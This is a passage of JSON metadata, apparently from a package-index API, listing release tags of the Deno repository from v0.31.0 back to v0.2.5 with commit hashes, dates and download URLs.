github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"de